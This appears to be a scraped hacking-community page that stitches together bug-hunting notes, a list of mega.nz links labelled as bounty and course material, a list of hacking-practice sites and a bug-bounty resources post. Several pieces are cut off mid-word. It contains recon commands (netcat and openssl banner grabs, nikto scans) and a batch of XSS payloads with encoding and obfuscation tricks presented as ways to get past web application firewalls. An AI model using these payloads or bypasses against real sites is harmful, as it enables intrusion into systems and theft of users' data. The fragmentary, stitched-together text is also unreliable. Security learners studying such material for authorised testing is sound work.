All About Hacking & Cybersecurity

Some Private Notes on Bug Hunting Aashish Kunvar Anon haxo: ########By dorkerdevil ##############                 Hope you like it #NavinYadav bro for u n for group                                                                                                                                                                                            Hack Notes echo -e "HEAD /HTTP/1.0\n\n" | nc -vv website.com echo -e "HEAD /HTTP/1.0\n\n" | openssl s_client -quit -connect website:443 nikto -p 80 -h website -verbose whisker2.1 -p 80 -h website enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl previous version of pages:~ extensions: .bak,.old,.orig,.txt search for common directories such as:~ /bak,/inc,/old,/script SQL connection strings:~ db= dbconn= ~:xss payloads to check:~ <script>alert(document.cookie)</script> 1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%

Web hacking bounty material https://mega.nz/#!4aRhnBCB!3566O84qBbGOvhXUk-8XAFL4bClp-rjcGWfkzl0X9M8 Certificacion de Seguridad-mexico (Curso) https://mega.nz/#!dJhVGapQ!UTsr9XlwatkVB5YWQ3PMjPbD32-DtESydlpxkjgJNs0 https://mega.nz/#!ZZ4xVa5R!JkAgL2JKmbeAdccVr2KTbNbI1fac6z_qjyApkn-YgL0 https://mega.nz/#!oYQBFaaQ!LJbJmqmrx3Oauq7vgimqQ2xPtFspLzzsyi7AHVR9HRY https://mega.nz/#!MMgQHApT!Ocz-ftOD1bC6aUVo0DJwKhe4TglYos_Vt5FckG_l9A4 https://mega.nz/#!4FoEAKYK!-55xUlQvGnemeT5A-3Pck68xEgg470h--Srp334Kb7k https://mega.nz/#!ZE4AQDSB!wN6hxKTC4YQLODau-OXwhctQse6sy8XrsxBgosNmviQ https://mega.nz/#!Ico0zSrA!Lh4TcmSuxRv3qb0VPI6yvM4KtA5h20my3W6SPd4Dbvc https://mega.nz/#!dAYhnJLb!utHluCuQycDuKZbTtUHpwZuOUFmMza0MVYoD8q_g1iU https://mega.nz/#!AEInSI5C!9jy-iSyCPSIpfF8mND6J8M1_YDQf9KkwEKiCOKzMMqM https://mega.nz/#!IFxUSQaK!RjIlGmQh7095A44oj6o0MvRyxEcRtFP3xrTGLHLmp9Y https://mega.nz/#!oAIgTDxY!b0O-77yh60vtybZsVB6XcltmJ4hpAyzHJwWjBBWO9DI https://mega.nz/#!IMI1TZqY!Va3U0jv-UeneNDqMO09Z2cNNobb9we8Zlb7RJ

EnigmaGroup http://www.enigmagroup.org/ Exploit Exercises http://exploit-exercises.com/ Google Gruyere http://google-gruyere.appspot.com/ Gh0st Lab http://www.gh0st.net/ Hack This Site http://www.hackthissite.org/ HackThis http://www.hackthis.co.uk/ HackQuest http://www.hackquest.com/ Hack.me https://hack.me Hacking-Lab https://www.hacking-lab.com Hacker Challenge http://www.dareyourmind.net/ Hacker Test http://www.hackertest.net/ hACME Game http://www.hacmegame.org/ Hax.Tor http://hax.tor.hu/ OverTheWire http://www.overthewire.org/wargames/ pwn0 https://pwn0.com/home.php RootContest http://rootcontest.com/ Root Me http://www.root-me.org/?lang=en Security Treasure Hunt http://www.securitytreasurehunt.com/ Smash The Stack http://www.smashthestack.org/ TheBlackSheep and Erik http://www.bright-shadows.net/ ThisIsLegal http://thisislegal.com/ Try2Hack http://www.try2hack.nl/ WabLab http://www.wablab.com/hackme XSS: Can You XSS This? http://can

JuanDeLemos: Some XSS payload starts  <!'/*!"/*!//'/*//"/*--!> or >');'>%>?>">">\x22\x3e/*-->]]> <!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg> Fuck WAF <script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/"> Fuck WAF with string obfuscation <script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/"> XSS in href link <a href="" onclick=``/name==alert(1)>clickme1</a> or <a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a> Rewrite page <a href="javascript:document.write('c========3'); void(0);">Middle-click me</a> New test   '\"--!><Body /Onpageshow=confirm`1`> "-->'><script>alert(1);</script>" List of different XSS Cheat

  Geekboy | Security Researcher Bug Bounty Hunter Starting Bug Bounty ? | Bug Bounty Resources Hey all  this post is not about any of my findings, its about resources for the bug bounties for learners, no matter you are starting or experienced, there is always something to learn from others. and if you are just starting into bug bounty then surly its going to be helpful post, and some kind of necessary to do as nowadays seen many new guys starting bug bounty by seeing that $$, its good that you want to make $$ from it but before that you should understand the process , quality and report writing which will help you to make more $$, so its better to understand 1st and then go for it. so here am going to add some links which have lots of info’s, resources, writeups about i was talking before. How to Become a Successful Bug Bounty HunterHow to become a Bug Bounty Hunter Bug Bounties 101The life of a bug bounty hunter Bounty Bug Write-upsFacebook Bug Bounties ap